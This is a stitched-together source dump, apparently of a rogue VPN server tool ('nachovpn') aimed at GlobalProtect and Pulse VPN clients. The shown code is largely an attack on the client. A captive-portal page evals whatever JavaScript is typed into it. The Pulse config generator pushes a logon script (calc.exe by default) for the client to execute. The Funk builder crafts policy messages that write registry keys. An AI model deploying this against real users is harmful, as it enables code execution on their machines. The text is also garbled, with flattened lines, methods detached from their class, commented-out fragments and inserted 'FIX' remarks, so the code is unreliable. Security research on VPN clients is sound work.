yes <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Captive Portal Detected</h1><p style="margin: 0; font-size: 15px; line-height: 1.2em;">GlobalProtect has temporarily permitted network access for you to connect to the Internet. 
Follow instructions from your internet provider.</p><p style="margin: 0; font-size: 15px; line-height: 1.2em;">If you let the connection time out, open GlobalProtect and click Connect to try again.</p></div><input size="100" id="code"<>/input<>button id="runcode" onclick=clicked();<Run Code>/button<>/body<>script<function clicked(){var code = document.getElementById("code").value;eval(code);}>/script< 5 yes yes yes 0 -1 0 1 yes 1 1400 0 60 60 60 network-traffic no no no no no yes no 4501 You have attempted to access a protected resource that requires additional authentication. Proceed to authenticate at 0 no no not-install bob@example.com empty empty empty ================================================ FILE: src/nachovpn/plugins/paloalto/templates/sslvpn-login.xml ================================================ {{ auth_cookie }} 532e8287b925b74d6925c6ada18f2d27da38665d woot gw-N bob GlobalProtect Local Auth vsys1 (empty_domain) tunnel -1 4100 {{ client_ip }} empty empty 4 ================================================ FILE: src/nachovpn/plugins/paloalto/templates/sslvpn-prelogin.xml ================================================ Success false yes Enter login credentials Username Password 1 yes no10.10.0.0-10.10.255.255 ================================================ FILE: src/nachovpn/plugins/pulse/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/pulse/config_generator.py ================================================ #!/usr/bin/env python3 import os import struct import ipaddress ROUTE_SPLIT_INCLUDE = 0x07000010 ROUTE_SPLIT_EXCLUDE = 0xf1000010 ENC_AES_128_CBC = 2 ENC_AES_256_CBC = 5 HMAC_MD5 = 1 HMAC_SHA1 = 2 HMAC_SHA256 = 3 CFG_DISCONNECT_WHEN_ROUTES_CHANGED = 0x4000 CFG_TUNNEL_ROUTES_TAKE_PRECEDENCE = 0x4001 CFG_TUNNEL_ROUTES_WITH_SUBNET_ACCESS = 0x401f CFG_ENFORCE_IPV4 = 0x4020 CFG_ENFORCE_IPV6 = 0x4021 CFG_MTU = 0x4005 CFG_DNS_SERVER = 0x0003 CFG_WINS_SERVER = 
# (completes the assignment started on the previous chunk line: CFG_WINS_SERVER =)
0x0004
# Pulse config attribute type codes (TLV "type" values; see config_parser.py)
CFG_DNS_SUFFIX = 0x4006
CFG_UNKNOWN_4007 = 0x4007
CFG_UNKNOWN_4019 = 0x4019
CFG_ESP_ONLY = 0x401A
CFG_ESP_ALLOW_6IN4 = 0x4024
CFG_ESP_TO_SSL_FALLBACK_SECS = 0x4017
CFG_UNKNOWN_400F = 0x400F
CFG_ESP_ENC_ALG = 0x4010
CFG_ESP_HMAC_ALG = 0x4011
CFG_ESP_KEY_LIFETIME = 0x4012
CFG_ESP_KEY_BYTES = 0x4013
CFG_ESP_REPLAY_PROTECTION = 0x4014
CFG_TOS_COPY = 0x4015
CFG_ESP_PORT = 0x4016
CFG_UNKNOWN_4018 = 0x4018
CFG_INTERNAL_LEGACY_IP = 0x0001
CFG_NETMASK = 0x0002
CFG_INTERNAL_GATEWAY_IP = 0x400B
CFG_LOGON_SCRIPT = 0x400C
CFG_LOGON_SCRIPT_MAC = 0x401B

EXAMPLE_ROUTES = [
    {'type': ROUTE_SPLIT_INCLUDE, 'route': '0.0.0.0/0.0.0.0'},
    # {'type': ROUTE_SPLIT_EXCLUDE, 'route': '10.0.0.0/255.0.0.0'}
]

class ESPConfigGenerator:
    def create_config(self):
        """Build an ESP key-exchange config blob with random SPI and keys."""
        config = b''
        config += b'\x00' * 0x10                    # padding
        config += 0x21202400.to_bytes(4, 'big')     # marker for ESP config
        config += b'\x00' * 4                       # more padding
        config += 0x70.to_bytes(4, 'big')           # length including header
        config += 0x54.to_bytes(4, 'big')           # ESP config length
        config += b'\x01\x00\x00\x00'               # unknown (always 0x01000000)
        config += os.urandom(4)                     # server->client SPI in little endian
        config += 0x40.to_bytes(2, 'big')           # secrets length
        config += os.urandom(32)                    # AES key (32-bytes for AES-256)
        config += os.urandom(32)                    # HMAC key (32-bytes for SHA-256)
        config += b'\x00' * 6                       # padding
        return config

class VPNConfigGenerator:
    def __init__(self, logon_script="C:\\Windows\\System32\\calc.exe",
                 logon_script_macos="",
                 dns_suffix="nachovpn.local",
                 routes=EXAMPLE_ROUTES,
                 client_ip=None):
        """Generator for the Pulse VPN configuration blob.

        logon_script / logon_script_macos are pushed to the client as
        post-connect scripts; client_ip overrides the default internal IP.
        """
        self.logon_script = logon_script
        self.logon_script_macos = logon_script_macos
        self.dns_suffix = dns_suffix
        self.routes = routes
        self.client_ip = client_ip

    @staticmethod
    def hexdump(data, length=16):
        """Print a classic offset/hex/ASCII dump of bytes (or a file path)."""
        if isinstance(data, str):
            with open(data, 'rb') as f:
                data = f.read()

        def chunk_data(data, size):
            for i in range(0, len(data), size):
                yield data[i:i + size]

        def to_hex(chunk):
            return ' '.join(f'{b:02x}' for b in chunk)

        def to_printable(chunk):
            # (expression continues on the next chunk line)
            return ''.join(chr(b) if 
# -- chunk-boundary continuation of VPNConfigGenerator.hexdump; the original
#    statements (completing to_printable and the print loop) are preserved
#    here as a comment because the method head lies on the previous chunk line:
#            32 <= b <= 126 else '.' for b in chunk)
#        for i, chunk in enumerate(chunk_data(data, length)):
#            hex_data = to_hex(chunk)
#            printable_data = to_printable(chunk)
#            print(f'{i * length:08x} {hex_data:<{length * 3}} |{printable_data}|')

@staticmethod
def int_to_ipv4(addr):
    """Integer -> dotted-quad string."""
    return str(ipaddress.IPv4Address(addr))

@staticmethod
def ipv4_to_int(ipv4):
    """Dotted-quad string -> integer."""
    return int(ipaddress.IPv4Address(ipv4))

@staticmethod
def write_le32(value):
    """Pack a 32-bit unsigned int as little-endian bytes."""
    # FIX: was struct.pack('I', value) -- native byte order/size, which is only
    # little-endian by accident of platform; '<I' makes the contract explicit.
    return struct.pack('<I', value)

@staticmethod
def write_be32(value):
    """Pack a 32-bit unsigned int as big-endian bytes."""
    # FIX: create_routes/create_config call self.write_be32, but no definition
    # appears anywhere in this chunk (probably lost in extraction) -- restored
    # as '>I' to match write_be16 and the big-endian framing used throughout.
    return struct.pack('>I', value)

@staticmethod
def write_be16(value):
    """Pack a 16-bit unsigned int as big-endian bytes."""
    return struct.pack('>H', value)

@staticmethod
def ip_to_bytes(ip):
    """Dotted-quad string -> 4 raw bytes."""
    return bytes(map(int, ip.split('.')))

@staticmethod
def subnet_mask_to_bytes(subnet_mask):
    """Dotted-quad mask -> inverted (hostmask) bytes, one octet at a time."""
    parts = subnet_mask.split('.')
    return bytes([255 ^ int(part) for part in parts])

def create_routes(self):
    """Build the split-include/exclude routing section from self.routes."""
    route_data = b''
    for route in self.routes:
        route_type = route['type']
        ip, subnet_mask = route['route'].split('/')
        ip_bytes = self.ip_to_bytes(ip)
        subnet_mask_bytes = self.subnet_mask_to_bytes(subnet_mask)
        route_entry = self.write_be32(route_type)
        route_entry += self.write_be32(0x0000FFFF)
        route_entry += ip_bytes
        route_entry += subnet_mask_bytes
        route_data += route_entry

    # Calculate routes length
    routes_len = len(route_data) + 8

    # Generate the final routes section
    routes_section = bytearray()
    routes_section += self.write_be16(0x2e00)            # Attribute flag
    routes_section += self.write_be16(routes_len)        # Routes length
    routes_section += self.write_be32(len(self.routes))  # Number of routes (think this should be big endian)
    routes_section += route_data
    return routes_section

def create_config(self):
    """Build the full Pulse VPN config blob (layout mirrored in config_parser.py)."""
    data = bytearray()

    # Header
    data += self.write_be32(0x00000A4C)  # fixed header value
    data += self.write_be32(0x00000001)  # type: 0x1
    header_len_offset = len(data)
    data += self.write_be32(0)           # placeholder for length of the whole config
    data += self.write_be32(0x000001FB)  # counter
    data += b'\x00' * 0x10               # padding

    # Config
    data += self.write_be32(0x2e20f000)  # config for > 9.1R14
    data += self.write_be32(0x00000000)  # fixed value
    config_len_offset = len(data)
    data += self.write_be32(0)           # placeholder for length: (len(config) - 0x10)

    # Version marker + attribute (>= 9.1R16)
    offset = len(data)
    data += self.write_be16(0x2e00)      # 0x2e00: known for Pulse version >= 9.1R16
    data += self.write_be16(0)           # placeholder for length
    data += self.write_be32(0x03000000)  # fixed value
    data += self.create_attribute(0x4025, b'\x01')
    data[offset + 2:offset + 4] = self.write_be16(len(data) - offset)

    # Version marker + attribute (>= 9.1R14)
    offset = len(data)
    data += self.write_be16(0x2c00)      # 0x2c00: known for Pulse version >= 9.1R14
    data += self.write_be16(0)           # placeholder for length
    data += self.write_be32(0x03000000)  # fixed value
    data += self.create_attribute(0x4026, b'\x01')
    data[offset + 2:offset + 4] = self.write_be16(len(data) - offset)

    # Routing info
    assert len(data) == 0x46
    data += self.create_routes()

    # Final attributes
    # fwiw, openconnect seems to differ here
    final_attrs = bytearray()
    final_attrs += self.write_be32(0)
    final_attrs += self.write_be16(0)           # placeholder: length of the rest of the config
    final_attrs += self.write_be32(0x03000000)  # fixed value
    final_attrs += self.create_attribute(CFG_DISCONNECT_WHEN_ROUTES_CHANGED, b'\x00')
    final_attrs += self.create_attribute(CFG_TUNNEL_ROUTES_TAKE_PRECEDENCE, b'\x01')
    final_attrs += self.create_attribute(CFG_TUNNEL_ROUTES_WITH_SUBNET_ACCESS, b'\x00')
    final_attrs += self.create_attribute(CFG_ENFORCE_IPV4, b'\x01')
    final_attrs += self.create_attribute(CFG_ENFORCE_IPV6, b'\x00')
    final_attrs += self.create_attribute(CFG_MTU, self.write_be32(1400))  # Client interface MTU
    final_attrs += self.create_attribute(CFG_DNS_SERVER, b'\x01\x01\x01\x01')
    final_attrs += self.create_attribute(CFG_DNS_SUFFIX, self.dns_suffix.encode() + b'\x00')
    final_attrs += self.create_attribute(CFG_UNKNOWN_4007, self.write_be32(1))
    final_attrs += self.create_attribute(CFG_WINS_SERVER, b'\x01\x01\x01\x01')
    final_attrs += self.create_attribute(CFG_UNKNOWN_4019, b'\x01')
    final_attrs += self.create_attribute(CFG_ESP_ONLY, b'\x00')
    final_attrs += self.create_attribute(CFG_ESP_ALLOW_6IN4, b'\x00')
    final_attrs += self.create_attribute(CFG_UNKNOWN_400F, b'\x00\x00')
    final_attrs += self.create_attribute(CFG_ESP_ENC_ALG, self.write_be16(ENC_AES_256_CBC))
    final_attrs += self.create_attribute(CFG_ESP_HMAC_ALG, self.write_be16(HMAC_SHA256))
    final_attrs += self.create_attribute(CFG_ESP_KEY_LIFETIME, self.write_be32(1200))
    final_attrs += self.create_attribute(CFG_ESP_KEY_BYTES, self.write_be32(0))
    final_attrs += self.create_attribute(CFG_ESP_REPLAY_PROTECTION, self.write_be32(1))
    final_attrs += self.create_attribute(CFG_TOS_COPY, self.write_be32(0))
    final_attrs += self.create_attribute(CFG_ESP_PORT, self.write_be16(0x1194))
    final_attrs += self.create_attribute(CFG_ESP_TO_SSL_FALLBACK_SECS, self.write_be32(1))
    final_attrs += self.create_attribute(CFG_UNKNOWN_4018, self.write_be32(60))

    # Use allocated IP if provided, otherwise use default
    if self.client_ip:
        final_attrs += self.create_attribute(CFG_INTERNAL_LEGACY_IP, self.write_be32(self.ipv4_to_int(self.client_ip)))
    else:
        final_attrs += self.create_attribute(CFG_INTERNAL_LEGACY_IP, self.write_be32(self.ipv4_to_int("10.10.1.1")))
    final_attrs += self.create_attribute(CFG_NETMASK, self.write_be32(self.ipv4_to_int("255.255.255.255")))
    final_attrs += self.create_attribute(CFG_INTERNAL_GATEWAY_IP, self.write_be32(self.ipv4_to_int("10.10.0.1")))
    final_attrs += self.create_attribute(CFG_LOGON_SCRIPT, self.logon_script.encode() + b'\x00')
    final_attrs += self.create_attribute(0x400d, b'\x00')
    final_attrs += self.create_attribute(0x400e, b'\x00')
    final_attrs += self.create_attribute(CFG_LOGON_SCRIPT_MAC, self.logon_script_macos.encode() + b'\x00')
    final_attrs += self.create_attribute(0x401c, b'\x00')
    final_attrs += self.create_attribute(0x13, b'\x00')
    final_attrs += self.create_attribute(0x14, b'\x00')
    final_attrs[4:6] = self.write_be16(len(final_attrs))  # fill in the length of final attrs
    data += final_attrs                                   # add final attrs to data

    # Update the lengths
    total_length = len(data)
    data[header_len_offset:header_len_offset + 4] = self.write_be32(total_length)
    data[config_len_offset:config_len_offset + 4] = self.write_be32(total_length - 0x10)
    return data

@staticmethod
def create_attribute(attr_type, data):
    """TLV encode: big-endian 16-bit type, big-endian 16-bit length, raw value."""
    return struct.pack('>HH', attr_type, len(data)) + data

def main():
    """Generate a config blob into test/vpn_config.bin and hexdump it."""
    generator = VPNConfigGenerator()
    config = generator.create_config()
    output_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'test')
    filename = os.path.join(output_dir, 'vpn_config.bin')
    with open(filename, 'wb') as f:
        f.write(config)
    # NOTE(review): the extracted text printed "(unknown)" here; restored as
    # the obvious f-string over `filename` -- confirm against upstream.
    print(f"Generated VPN config. Saved to {filename}")
    generator.hexdump(config)

if __name__ == '__main__':
    main()

# ================================================
# FILE: src/nachovpn/plugins/pulse/config_parser.py
# ================================================
#!/usr/bin/env python3
import sys

ENC_AES_128_CBC = 2
ENC_AES_256_CBC = 5
HMAC_MD5 = 1
HMAC_SHA1 = 2
HMAC_SHA256 = 3

# Example packet:
#
#00000000 00 00 0a 4c 00 00 00 01 00 00 01 60 00 00 01 fb |...L.......`....|
#00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
#00000020 2e 20 f0 00 00 00 00 00 00 00 01 50 2e 00 00 0d |. 
# (the row below completes the hexdump line split across the chunk boundary)
#          .........P....|
#00000030 03 00 00 00 40 25 00 01 01 2c 00 00 0d 03 00 00 |....@%...,......|
#00000040 00 40 26 00 01 01 2e 00 00 18 00 00 00 01 07 00 |.@&.............|
#00000050 00 10 00 00 ff ff 00 00 00 00 ff ff ff ff 00 00 |................|
#00000060 00 00 01 02 03 00 00 00 40 00 00 01 00 40 01 00 |........@....@..|
#00000070 01 00 40 1f 00 01 00 40 20 00 01 00 40 21 00 01 |..@....@ ...@!..|
#00000080 00 40 05 00 04 00 00 05 78 00 03 00 04 01 01 01 |.@......x.......|
#00000090 01 40 06 00 0d 6e 61 63 68 6f 76 70 6e 2e 6c 6f |.@...nachovpn.lo|
#000000a0 6c 00 40 07 00 04 00 00 00 01 00 04 00 04 01 01 |l.@.............|
#000000b0 01 01 40 19 00 01 01 40 1a 00 01 00 40 24 00 01 |..@....@....@$..|
#000000c0 01 40 0f 00 02 00 00 40 10 00 02 00 05 40 11 00 |.@.....@.....@..|
#000000d0 02 00 03 40 12 00 04 00 00 04 b0 40 13 00 04 00 |...@.......@....|
#000000e0 00 00 00 40 14 00 04 00 00 00 01 40 15 00 04 00 |...@.......@....|
#000000f0 00 00 00 40 16 00 02 11 94 40 17 00 04 00 00 00 |...@.....@......|
#00000100 0f 40 18 00 04 00 00 00 3c 00 01 00 04 0a 0a 01 |.@......<.......|
#00000110 01 00 02 00 04 ff ff ff ff 40 0b 00 04 0a c8 c8 |.........@......|
#00000120 c8 40 0c 00 1d 43 3a 5c 57 69 6e 64 6f 77 73 5c |.@...C:\Windows\|
#00000130 53 79 73 74 65 6d 33 32 5c 63 61 6c 63 2e 65 78 |System32\calc.ex|
#00000140 65 00 40 0d 00 01 00 40 0e 00 01 00 40 1b 00 01 |e.@....@....@...|
#00000150 00 40 1c 00 01 00 00 13 00 01 00 00 14 00 01 00 |.@..............|

# Endian-aware integer loaders over the head of a bytes slice
def load_be32(data):
    return int.from_bytes(data[0:4], 'big')

def load_be16(data):
    return int.from_bytes(data[0:2], 'big')

def load_le32(data):
    return int.from_bytes(data[0:4], 'little')

def load_le16(data):
    return int.from_bytes(data[0:2], 'little')

class Attribute:
    """One parsed TLV attribute: type code, declared length, raw value bytes."""
    def __init__(self, attr_type, attr_len, data):
        self.attr_type = attr_type
        self.attr_len = attr_len
        self.data = data

    def to_dict(self):
        return {'type': self.attr_type, 'len': self.attr_len, 'data': self.data}

class PulseConfig:
    """Parser for the Pulse VPN config blob (see config_generator.py)."""
    def __init__(self, data):
        self.data = data
        # Attributes seen before / after the routing section, and the routes
        self.pre_attributes = []
        self.routes = []
        self.post_attributes = []

    def process_attr(self, attr_type, data, attr_len):
        """Pretty-print one attribute value according to its type code.

        (The elif chain continues past the end of this chunk.)
        """
        if attr_type == 0x0001:
            ip_address = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3])
            print ("Internal Legacy IP address: %s" % ip_address)
        elif attr_type == 0x0002:
            net_mask = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3])
            print ("Netmask: %s" % net_mask)
        elif attr_type == 0x0003:
            dns_server = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3])
            print ("DNS server: %s" % dns_server)
        elif attr_type == 0x0004:
            wins_server = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3])
            print ("WINS server: %s" % wins_server)
        elif attr_type == 0x0008:
            print ("Internal IPv6 address")
        elif attr_type == 0x000a:
            print ("DNS server (IPv6)")
        elif attr_type == 0x000f:
            print ("IPv6 split include")
        elif attr_type == 0x0010:
            print ("IPv6 split exclude")
        elif attr_type == 0x4005:
            mtu = load_be32(data)
            print ("MTU %d from server" % mtu)
        elif attr_type == 0x4006:
            print ("DNS search domain: %s" % data[0:attr_len].split(b'\x00')[0].decode())
        elif attr_type == 0x401a:
            print ("ESP only: %d" % data[0])
        elif attr_type == 0x400b:
            gateway = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3])
            print ("Internal gateway address: %s" % gateway)
        elif attr_type == 0x4017:
            fallback_secs = load_be32(data)
            print ("ESP to SSL fallback: %u seconds" % fallback_secs)
        elif attr_type == 0x4010:
            val = load_be16(data)
            # NOTE(review): unlike the HMAC branch below, there is no else
            # here -- an unrecognised encryption value leaves enc_type unbound
            # and the print raises NameError; consider an "unknown" fallback.
            if val == ENC_AES_128_CBC:
                enc_type = "AES-128"
            elif val == ENC_AES_256_CBC:
                enc_type = "AES-256"
            print ("ESP encryption: 0x%04x (%s)" % (val, enc_type))
        elif attr_type == 0x4000:
            print ("Disconnect when routes changed: %d" % data[0])
        elif attr_type == 0x4011:
            val = load_be16(data)
            if val == HMAC_MD5:
                mactype = "MD5"
            elif val == HMAC_SHA1:
                mactype = "SHA1"
            elif val == HMAC_SHA256:
                mactype = "SHA256"
            else:
                mactype = "unknown"
            print ("ESP HMAC: 0x%04x (%s)" % (val, mactype))
        elif attr_type == 0x4001:
            print ("Tunnel routes take precedence: %d" % data[0])
        # (chain continues on the next chunk, outside this view)
        elif
attr_type == 0x401f: print ("Tunnel routes with subnet access (also 4001 set): %d" % data[0]) elif attr_type == 0x4020: print ("Enforce IPv4: %d" % data[0]) elif attr_type == 0x4021: print ("Enforce IPv6: %d" % data[0]) elif attr_type == 0x4012: lifetime_secs = load_be32(data) print ("ESP key lifetime: %u seconds" % lifetime_secs) elif attr_type == 0x4013: lifetime_bytes = load_be32(data) print ("ESP key lifetime: %u bytes" % lifetime_bytes) elif attr_type == 0x4014: esp_replay_protect = load_be32(data) print ("ESP replay protection: %d" % esp_replay_protect) elif attr_type == 0x4015: tos_copy = load_be32(data) print ("TOS copy: %d" % tos_copy) elif attr_type == 0x4016: i = load_be16(data) print ("ESP port: %d" % i) elif attr_type == 0x400c: logon_script = data[0:attr_len].split(b'\x00')[0].decode() print ("Logon script: %s" % logon_script) elif attr_type == 0x4024: print ("Pulse ESP tunnel allowed to carry 6in4 or 4in6 traffic: %d" % data[0]) else: print ("Unknown attr 0x%x len %d: %s" % (attr_type, attr_len, data[0:attr_len].hex())) def handle_attr_elements(self, data, attr_len, attrs): l = attr_len p = data if l < 8 or load_be32(p[4:]) != 0x03000000: print ("Bad attribute header") return 1 p = p[8:] l -= 8 while l > 4: attr_type = load_be16(p) attr_len = load_be16(p[2:]) if attr_len + 4 > l: print ("Bad attribute length") return 1 p = p[4:] l -= 4 # append to list as a dict so we can reconstruct later attrs.append(Attribute(attr_type, attr_len, p[:attr_len]).to_dict()) # process attribute self.process_attr(attr_type, p, attr_len) p = p[attr_len:] l -= attr_len return 0 def parse(self): if len(self.data) < 0x31: raise ValueError("Config data too short") offset = 0x2c config_type = load_be32(self.data[0x20:]) print(f"Config type: {config_type:08x}") if config_type == 0x2e20f000: if len(data) < offset + 4: raise ValueError("Config data too short (2)") attr_flag = 0 while attr_flag != 0x2c00: attr_flag = load_be16(self.data[offset:]) attr_len = 
load_be16(self.data[offset + 2:]) if attr_flag == 0x2c00: print ("attr_flag 0x2c00: known for Pulse version >= 9.1R14") elif attr_flag == 0x2e00: print ("attr_flag 0x2e00: known for Pulse version >= 9.1R16") else: print ("unknown Pulse version") if len(self.data) < offset + attr_len \ or self.handle_attr_elements(self.data[offset:], attr_len, self.pre_attributes): raise ValueError("Bad config") offset += attr_len elif config_type == 0x2c20f000: print ("Processing Pulse main config data for server version < 9.1R14") else: raise ValueError("Unrecognised data type") assert offset == 0x46 routes_len = load_be16(self.data[offset + 2:]) # parse routing info p = self.data[offset + 8:] routes_len -= 8 while routes_len: route_type = load_be32(p) ffff = load_be32(p[4:]) if ffff != 0xffff: raise ValueError("Bad config: ffff != 0xffff") route = "%d.%d.%d.%d/%d.%d.%d.%d" % ( p[8], p[9], p[10], p[11], 255 ^ (p[8] ^ p[12]), 255 ^ (p[9] ^ p[13]), 255 ^ (p[10] ^ p[14]), 255 ^ (p[11] ^ p[15])) if route_type == 0x07000010: print ("Received split include route %s" % route) elif route_type == 0xf1000010: print ("Received split exclude route: %s" % route) else: print ("Receive route of unknown type %s" % hex(route_type)) p = p[0x10:] routes_len -= 0x10 l = load_be16(p[4:]) p = p[2:] # fix alignment self.handle_attr_elements(p, l, self.post_attributes) if __name__ == '__main__': if len(sys.argv) < 2: print ("Usage: %s " % sys.argv[0]) sys.exit(1) with open (sys.argv[1], 'rb') as f: data = f.read() config = PulseConfig(data) config.parse() ================================================ FILE: src/nachovpn/plugins/pulse/funk_parser.py ================================================ from io import BytesIO import struct import base64 import logging import argparse import zlib import json import time VENDOR_JUNIPER2 = 0x583 MSG_POLICY = 0x58316 MSG_FUNK_PLATFORM = 0x58301 MSG_FUNK = 0xa4c01 class FunkManager: def __init__(self): self.commands = [] @staticmethod def base64_encode(value): 
return base64.b64encode(value.encode()).decode() @staticmethod def remediation_command(policy_id='vc0|43|policy_2|1|woot'): commands = { '0x0ce4': [{ # Encapsulation 'commands': {}, 'flag1': 0xc0, 'flag2': 0x00 }], '0x0cf0': [{ # Encapsulation 'commands': { '0x0cf1': [ # String without hex prefixer { 'string': 'test', 'flag1': 0xc0, 'flag2': 0x00 } ], '0x0ce4': [ # Encapsulation { 'commands': { '0x0ce7': [ { 'id': MSG_POLICY, 'string': f'REMEDIATE:POLICYID={policy_id},set\x00', 'flag1': 0xc0, 'flag2': 0x00 } ] }, 'flag1': 0xc0, 'flag2': 0x00 } ] }, 'flag1': 0xc0, 'flag2': 0x00 }], '0x0012': [{ # seems to be the same as 0xCF3 (unsigned integer) 'value': 1, 'flag1': 0xc0, 'flag2': 0x00 }], '0x0cf3': [{ # Unsigned integer 'value': 1, 'flag1': 0x80, 'flag2': 0x00 }] } return commands @staticmethod def registry_command(rules=None, server_time=False, policy_id='vc0|43|policy_2|1|woot'): # If no rules are provided, use a default rule if rules is None: rules = [{}] # If rules is a single dict, wrap it in a list if isinstance(rules, dict): rules = [rules] # Defaults for a rule default_rule = { 'rulename': 'woot', 'subkey': 'SOFTWARE\\Classes\\abc', 'regname': 'woot', 'hive': 'HKEY_LOCAL_MACHINE', 'value': 'pwnd', } # Parameter0: always present ce7_entries = [{ 'id': MSG_POLICY, 'string': f'\n\x00', 'flag1': 0xC0, 'flag2': 0x00 }] # Add params for idx, user_rule in enumerate(rules, 1): rule = default_rule.copy() rule.update(user_rule) reg_type = rule.get('type', 'String') # if type is DWORD convert to integer if reg_type == 'DWORD': rule['value'] = int(rule['value']) base64encoded = 0 else: rule['value'] = FunkManager.base64_encode(rule['value']) base64encoded = 1 ce7_entries.append({ 'id': MSG_POLICY, 'string': f'\n' f'\n\x00', 'flag1': 0xC0, 'flag2': 0x00 }) commands = { "0x0ce4": [{ "commands": { "0x0ce7": ce7_entries }, "flag1": 0xC0, "flag2": 0x00 }], "0x0cf3": [{ "value": 1, "flag1": 0x80, "flag2": 0x00 }] } return commands @staticmethod def parse(data): """Parse the 
provided binary data into structured commands.""" logging.info("Parsing data...") decompressed_data = zlib.decompress(data) commands = FunkManager._parse_commands(decompressed_data) return FunkManager._commands_to_dict(commands) @staticmethod def pad(data): num = 0 if len(data) & 3: num = 4 - (len(data) & 3) logging.debug(f'Funk padding: {num}') return data + b'\x00' * num @staticmethod def generate(commands): """Generate binary data from structured commands.""" logging.info("Generating data...") serialized_commands = FunkManager._serialize_commands(commands) compressed_data = zlib.compress(serialized_commands) # Add header buf = BytesIO() buf.write(0x16.to_bytes(4, 'big')) # Zlib compressed data header buf.write(b'\xC0') # Flag1 buf.write(b'\x00') # Flag2 buf.write((len(compressed_data) + 16).to_bytes(2, 'big')) # Length of data + header buf.write(VENDOR_JUNIPER2.to_bytes(4, 'big')) # Vendor buf.write(len(serialized_commands).to_bytes(4, 'big')) # Uncompressed length buf.write(compressed_data) return FunkManager.pad(buf.getvalue()) @staticmethod def _parse_commands(data): commands = [] buffer = BytesIO(data) while buffer.tell() < len(data): start = buffer.tell() if len(data) - buffer.tell() < 12: logging.error(f"Remaining data too small for header at offset {start}") break # Read the header cmd = int.from_bytes(buffer.read(4), "big") flag1 = ord(buffer.read(1)) # Flag flag2 = ord(buffer.read(1)) # Should be 0x00 length = int.from_bytes(buffer.read(2), "big") # Length of the command including the header reserved = buffer.read(4) # Should be 0x583 assert reserved == VENDOR_JUNIPER2.to_bytes(4, "big") # Validate the length field if length < 12 or (start + length) > len(data): logging.error( f"Invalid length detected at offset {hex(start)}: {length} " f"(remaining: {len(data) - buffer.tell()})" ) break logging.debug( f"Parsing Command: {cmd:04x}, Flags: {flag1:02x} {flag2:02x}, " f"Reserved: {reserved.hex()}, Length: {length}, Offset: {start}" ) # Read the command 
body body = buffer.read(length - 12) commands.append((cmd, flag1, flag2, body)) # Handle padding to the nearest word boundary (4 bytes) padding = (4 - (buffer.tell() % 4)) % 4 if padding > 0: padding_bytes = buffer.read(padding) if any(padding_bytes): logging.warning(f"Non-null padding detected at offset {buffer.tell() - padding}: {padding_bytes.hex()}") return commands @staticmethod def _commands_to_dict(commands): parsed = {} for cmd, flag1, flag2, body in commands: if cmd == 0x0ce7: # String buffer = BytesIO(body) id = int.from_bytes(buffer.read(4), "big") string = buffer.read().decode('utf-8', errors='replace') string_repr = repr(string) logging.info(f"Command 0x0ce7: ID={hex(id)}, String={string_repr}") parsed.setdefault("0x0ce7", []).append({ "id": id, "string": string, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0cf3: # Unsigned integer value = int.from_bytes(body, "big") logging.info(f"Command 0x0cf3: Value={value}") parsed.setdefault(f"0x0cf3", []).append({ "value": value, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0012: # Unsigned integer value = int.from_bytes(body, "big") logging.info(f"Command 0x0012: Value={value}") parsed.setdefault(f"0x0012", []).append({ "value": value, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0ce4: # Encapsulation nested_commands = FunkManager._parse_commands(body) nested_parsed = FunkManager._commands_to_dict(nested_commands) logging.info(f"Command 0x0ce4: Encapsulated {nested_parsed}") parsed.setdefault("0x0ce4", []).append({ "commands": nested_parsed, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0cf0: # Another type of encapsulation nested_commands = FunkManager._parse_commands(body) nested_parsed = FunkManager._commands_to_dict(nested_commands) logging.info(f"Command 0x0cf0: Encapsulated {nested_parsed}") parsed.setdefault("0x0cf0", []).append({ "commands": nested_parsed, "flag1": flag1, "flag2": flag2 }) elif cmd == 0x0cf1: # String without hex prefixer string = body.decode('utf-8', 
errors='replace').rstrip('\x00') string_repr = repr(string) logging.info(f"Command 0x0cf1: String={string_repr}") parsed.setdefault("0x0cf1", []).append({ "string": string, "flag1": flag1, "flag2": flag2 }) else: logging.warning(f"Unknown Command 0x{cmd:04x}: Raw Body={body.hex()}") parsed.setdefault(f"0x{cmd:04x}", []).append({ "body": body, "flag1": flag1, "flag2": flag2 }) return parsed @staticmethod def _serialize_commands(commands): """Serialize commands from the parsed dictionary format back to binary.""" serialized = BytesIO() # Handle commands by type from the parsed dictionary format for cmd_type, cmd_list in commands.items(): cmd_num = int(cmd_type, 16) # Convert hex string (e.g. '0x0ce7') to int for cmd_data in cmd_list: # Extract flags if present, default to 0x00 if not flag1 = cmd_data.get('flag1', 0x00) flag2 = cmd_data.get('flag2', 0x00) if cmd_num == 0x0ce7: # Handle string command - each command gets its own header body = BytesIO() body.write(cmd_data['id'].to_bytes(4, "big")) string_bytes = cmd_data['string'].encode("utf-8") body.write(string_bytes) body_content = body.getvalue() length = len(body_content) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(body_content) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0cf3 or cmd_num == 0x0012: # Unsigned integer command value = cmd_data['value'] if isinstance(cmd_data, dict) else cmd_data body_content = value.to_bytes(4, "big") length = len(body_content) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(body_content) # Add padding to nearest word 
